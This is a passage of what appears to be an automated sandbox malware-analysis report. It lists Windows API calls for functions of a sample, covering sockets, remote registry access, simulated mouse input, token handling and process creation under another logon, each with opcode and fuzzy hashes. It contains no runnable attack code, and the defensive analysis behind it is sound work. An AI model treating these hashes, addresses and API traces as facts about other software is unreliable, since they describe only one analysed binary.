                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0089661F
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00896630
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0089664A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: bf7aa80fc183d0faa9c98b473558942ebf01bb1616d8b86fb50359bea9bbc615
                                                            • Instruction ID: 844ed078460232eb5cce75d680e05b987e4249570f3aef2b5fbb8d968f9dd548
                                                            • Opcode Fuzzy Hash: bf7aa80fc183d0faa9c98b473558942ebf01bb1616d8b86fb50359bea9bbc615
                                                            • Instruction Fuzzy Hash: 20310230644214AFDF21AF18DC85F553BE1FB5A350F1A02A9F601CB2B6EB61A860DB41
                                                            APIs
                                                              • Part of subcall function 008880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008880CB
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008864D9
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008864E8
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00886521
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 0088652A
                                                            • WSAGetLastError.WSOCK32 ref: 00886534
                                                            • closesocket.WSOCK32(00000000), ref: 0088655D
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00886576
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: 560fe491b2ea70851eb21594d250ea1f3bc78c5f9b651af761ef3b6e5dbb9b79
                                                            • Instruction ID: 51fa5a4a8aaac2ffe40ecb328239c90b0717165070745676ddf7ce3b7fa78051
                                                            • Opcode Fuzzy Hash: 560fe491b2ea70851eb21594d250ea1f3bc78c5f9b651af761ef3b6e5dbb9b79
                                                            • Instruction Fuzzy Hash: A931A171600118ABDB10BF64CC85BBE7BADFF44714F044069F94AE7291EB74AD54CBA2
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0086E0FA
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0086E120
                                                            • SysAllocString.OLEAUT32(00000000), ref: 0086E123
                                                            • SysAllocString.OLEAUT32 ref: 0086E144
                                                            • SysFreeString.OLEAUT32 ref: 0086E14D
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0086E167
                                                            • SysAllocString.OLEAUT32(?), ref: 0086E175
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 875be80ac515ce6a00033cfc6a24130bead5db2fb0326d6a317483a9220270e5
                                                            • Instruction ID: 777d7dc8ae4c571549fbd16c5c40db0baefa2951736a3b5f55ac035ff2ed9234
                                                            • Opcode Fuzzy Hash: 875be80ac515ce6a00033cfc6a24130bead5db2fb0326d6a317483a9220270e5
                                                            • Instruction Fuzzy Hash: 1B219835604108AFDF14AFA8DC88CAB77ECFB09760B158136FA55CB261DA70DC41DB65
                                                            APIs
                                                              • Part of subcall function 00811D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00811D73
                                                              • Part of subcall function 00811D35: GetStockObject.GDI32(00000011), ref: 00811D87
                                                              • Part of subcall function 00811D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00811D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008978A1
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008978AE
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008978B9
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008978C8
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008978D4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 19bea087da78e1d8afb0f443bc8f3ab2af763f0ab5d82428e2095ec949f8dd53
                                                            • Instruction ID: 0190437af09d8a923b004397630bc3c74cb5f2cfb76a4a4f3db7b0fce27947ba
                                                            • Opcode Fuzzy Hash: 19bea087da78e1d8afb0f443bc8f3ab2af763f0ab5d82428e2095ec949f8dd53
                                                            • Instruction Fuzzy Hash: 36118EB2110219BFEF15AE64CC85EEB7F6DFF08798F054125FA04A2090C7729C21DBA4
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00834292,?), ref: 008341E3
                                                            • GetProcAddress.KERNEL32(00000000), ref: 008341EA
                                                            • EncodePointer.KERNEL32(00000000), ref: 008341F6
                                                            • DecodePointer.KERNEL32(00000001,00834292,?), ref: 00834213
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoInitialize$combase.dll
                                                            • API String ID: 3489934621-340411864
                                                            • Opcode ID: 5fb6b11b7d018dcbe87287f3dca9a5f7b840687f88472f282ad64f3cf77e63ea
                                                            • Instruction ID: 876c585864ca3d500ed4088295f4dc5dc9b62b77cdf32c7a6968cca486ed3d66
                                                            • Opcode Fuzzy Hash: 5fb6b11b7d018dcbe87287f3dca9a5f7b840687f88472f282ad64f3cf77e63ea
                                                            • Instruction Fuzzy Hash: 34E04FB0691300AFEF206FB4EC0DB043BA5F761706F546636B621E55F2DBBA50919F00
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008341B8), ref: 008342B8
                                                            • GetProcAddress.KERNEL32(00000000), ref: 008342BF
                                                            • EncodePointer.KERNEL32(00000000), ref: 008342CA
                                                            • DecodePointer.KERNEL32(008341B8), ref: 008342E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 3f936b8172b76fae5352a93c4d0d938cf46e2ddd2fc446e9f734c26896174a7a
                                                            • Instruction ID: fdf0cc4f53605cc1dd75591e96a1ca5eab9ae0f2e8cbdc8cb576e6f78f37ce08
                                                            • Opcode Fuzzy Hash: 3f936b8172b76fae5352a93c4d0d938cf46e2ddd2fc446e9f734c26896174a7a
                                                            • Instruction Fuzzy Hash: B9E0B678582311AFEF14AB64EC0DB053BA4F725742F14613BF211F16A1CBB99580DA54
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: f4fd3e921c37a78768245253f5814d4108beca0a9f1bc83745ed1e4181353ff9
                                                            • Instruction ID: ec3c46e3e2ab90ab0c97fea464f078b43500fac6c142815c50284983fd1faef2
                                                            • Opcode Fuzzy Hash: f4fd3e921c37a78768245253f5814d4108beca0a9f1bc83745ed1e4181353ff9
                                                            • Instruction Fuzzy Hash: 8E61DF30504A5A9BCF15EF28CC91EFE3BA8FF44708F048518F9999B196EB34D851CB92
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 008910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00890038,?,?), ref: 008910BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00890548
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00890588
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 008905AB
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008905D4
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00890617
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00890624
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: 73e187d4a757c4622daf5b3ca6139f7a1292e62ac14750688947f8387547b382
                                                            • Instruction ID: c397a1f6f8d6daf84da7b8aa4e692ac9f10e2edb37ec125aadb41f9960150471
                                                            • Opcode Fuzzy Hash: 73e187d4a757c4622daf5b3ca6139f7a1292e62ac14750688947f8387547b382
                                                            • Instruction Fuzzy Hash: 58514931608340AFCB14EB68C885EAABBE9FF84714F08491DF595D72A2DB31E944CF52
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00895A82
                                                            • GetMenuItemCount.USER32(00000000), ref: 00895AB9
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00895AE1
                                                            • GetMenuItemID.USER32(?,?), ref: 00895B50
                                                            • GetSubMenu.USER32(?,?), ref: 00895B5E
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00895BAF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: 12050e60593158db44ff8d1b4de7de2ee6cc01e52c8a0be5c8d565de1ffe9f2e
                                                            • Instruction ID: 8da53c6f7139312fda2e6668c4238430d0b76defd7a7dbff174b8dd5aec9b24e
                                                            • Opcode Fuzzy Hash: 12050e60593158db44ff8d1b4de7de2ee6cc01e52c8a0be5c8d565de1ffe9f2e
                                                            • Instruction Fuzzy Hash: 7B519131A00625EFCF15EFA8C855AAEB7B4FF48320F184469E945F7351CB70AE418B95
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0086F3F7
                                                            • VariantClear.OLEAUT32(00000013), ref: 0086F469
                                                            • VariantClear.OLEAUT32(00000000), ref: 0086F4C4
                                                            • _memmove.LIBCMT ref: 0086F4EE
                                                            • VariantClear.OLEAUT32(?), ref: 0086F53B
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0086F569
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: e52a3b6d10b70b51828e131771edbcc76892ce0a00afe7e864af1816317d6a96
                                                            • Instruction ID: 56f667075cd44cdcad9f5af589ab5efdb554af5bc1d95c80916c6ad629c2edd9
                                                            • Opcode Fuzzy Hash: e52a3b6d10b70b51828e131771edbcc76892ce0a00afe7e864af1816317d6a96
                                                            • Instruction Fuzzy Hash: 91514CB5A00209DFCB14DF58D884AAAB7F8FF4C354B15856AEA59DB311D730E911CBA0
                                                            APIs
                                                            • _memset.LIBCMT ref: 00872747
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00872792
                                                            • IsMenu.USER32(00000000), ref: 008727B2
                                                            • CreatePopupMenu.USER32 ref: 008727E6
                                                            • GetMenuItemCount.USER32(000000FF), ref: 00872844
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00872875
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 3eb59b02f14b13f242d605f9df66c7bcb23f82abc3c0f2ac25915e28c1d19935
                                                            • Instruction ID: f7df443b8b98c537093a88025a12b0f1f7dd35607ac96a81cdf2be333bb327a6
                                                            • Opcode Fuzzy Hash: 3eb59b02f14b13f242d605f9df66c7bcb23f82abc3c0f2ac25915e28c1d19935
                                                            • Instruction Fuzzy Hash: 7451A170A00209DBDF24CF68C888BADBBF4FF55314F148169E429DB299D771C944CB52
APIs
  • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
• BeginPaint.USER32(?,?,?,?,?,?), ref: 0081179A
• GetWindowRect.USER32(?,?), ref: 008117FE
• ScreenToClient.USER32(?,?), ref: 0081181B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0081182C
• EndPaint.USER32(?,?), ref: 00811876
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
• Opcode ID: a46b137351d99dfa4cdced0649c94b73669c0dedb5de53d3ccc6f2d16f0c2ad4
• Instruction ID: fca2ed7778458eee18f455906f522687fac210b6ddcae531562401ea03cb2569
• Opcode Fuzzy Hash: a46b137351d99dfa4cdced0649c94b73669c0dedb5de53d3ccc6f2d16f0c2ad4
• Instruction Fuzzy Hash: C341A0701053059FDB11DF28DC88BBA7BE8FF49724F144639F6A4C62A2D7319885DB62
APIs
• ShowWindow.USER32(008D67B0,00000000,017C4D80,?,?,008D67B0,?,0089B862,?,?), ref: 0089B9CC
• EnableWindow.USER32(00000000,00000000), ref: 0089B9F0
• ShowWindow.USER32(008D67B0,00000000,017C4D80,?,?,008D67B0,?,0089B862,?,?), ref: 0089BA50
• ShowWindow.USER32(00000000,00000004,?,0089B862,?,?), ref: 0089BA62
• EnableWindow.USER32(00000000,00000001), ref: 0089BA86
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 0089BAA9
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 9edabcfb9922758fcac9b57bce47dec83646db8c29abe2722c13ee6703ff7d2a
• Instruction ID: f8bd8b57a528b2c51853aa1a00ebf32b72893191cb6493b61b416941db806012
• Opcode Fuzzy Hash: 9edabcfb9922758fcac9b57bce47dec83646db8c29abe2722c13ee6703ff7d2a
• Instruction Fuzzy Hash: CF414C30601251AFDF26EF68E689B957BE0FB05310F1C42A9EA48CF2A2D731E845CB51
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00885134,?,?,00000000,00000001), ref: 008873BF
  • Part of subcall function 00883C94: GetWindowRect.USER32(?,?), ref: 00883CA7
• GetDesktopWindow.USER32 ref: 008873E9
• GetWindowRect.USER32(00000000), ref: 008873F0
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00887422
  • Part of subcall function 008754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0087555E
• GetCursorPos.USER32(?), ref: 0088744E
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008874AC
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: 0bac79fa7788642df78c22406dee3efabe576d315d55456d8607f6a6fab62506
• Instruction ID: ffaa977ec1971afcf56f05624f0e37124c35b0935a76e3ec1b2c6e9fa454a32a
• Opcode Fuzzy Hash: 0bac79fa7788642df78c22406dee3efabe576d315d55456d8607f6a6fab62506
• Instruction Fuzzy Hash: 51310472508306ABC724EF14D849F9BBBE9FF88304F10491AF588D7192C770EA48CB92
APIs
  • Part of subcall function 008685F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00868608
  • Part of subcall function 008685F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00868612
  • Part of subcall function 008685F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00868621
  • Part of subcall function 008685F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00868628
  • Part of subcall function 008685F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0086863E
• GetLengthSid.ADVAPI32(?,00000000,00868977), ref: 00868DAC
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00868DB8
• HeapAlloc.KERNEL32(00000000), ref: 00868DBF
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00868DD8
• GetProcessHeap.KERNEL32(00000000,00000000,00868977), ref: 00868DEC
• HeapFree.KERNEL32(00000000), ref: 00868DF3
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: 689d387f7c515a8b58f16e07077bc4e0e061163951007ef395f15b7bae3c210c
• Instruction ID: f3744bc80845e68be79bcf19a99ced712df57b978b49eedff669c2dac3390483
• Opcode Fuzzy Hash: 689d387f7c515a8b58f16e07077bc4e0e061163951007ef395f15b7bae3c210c
• Instruction Fuzzy Hash: FB11EE31500604FFDB24AFA4DC08BAE7BA9FF41315F15422AE949D3251CB329900CBA0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00868B2A
• OpenProcessToken.ADVAPI32(00000000), ref: 00868B31
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00868B40
• CloseHandle.KERNEL32(00000004), ref: 00868B4B
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00868B7A
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00868B8E
Memory Dump Source
• Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
• Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 8206bf6d15cd5f589290bd3adb7ed76645717932acea57426048cdd47db11ac5
• Instruction ID: 85da743785cb52d873b91068a8ab55eddf6e7d8d908f577ca58ce9fee6c91cfc
• Opcode Fuzzy Hash: 8206bf6d15cd5f589290bd3adb7ed76645717932acea57426048cdd47db11ac5
• Instruction Fuzzy Hash: C31159B250024DEBDF019FA4ED49FDA7BA9FF08314F094165FE08E2161C7768D64AB60
APIs
